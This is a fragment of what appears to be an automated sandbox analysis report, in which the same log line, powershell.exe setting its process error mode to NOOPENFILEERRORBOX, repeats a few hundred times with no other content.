                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
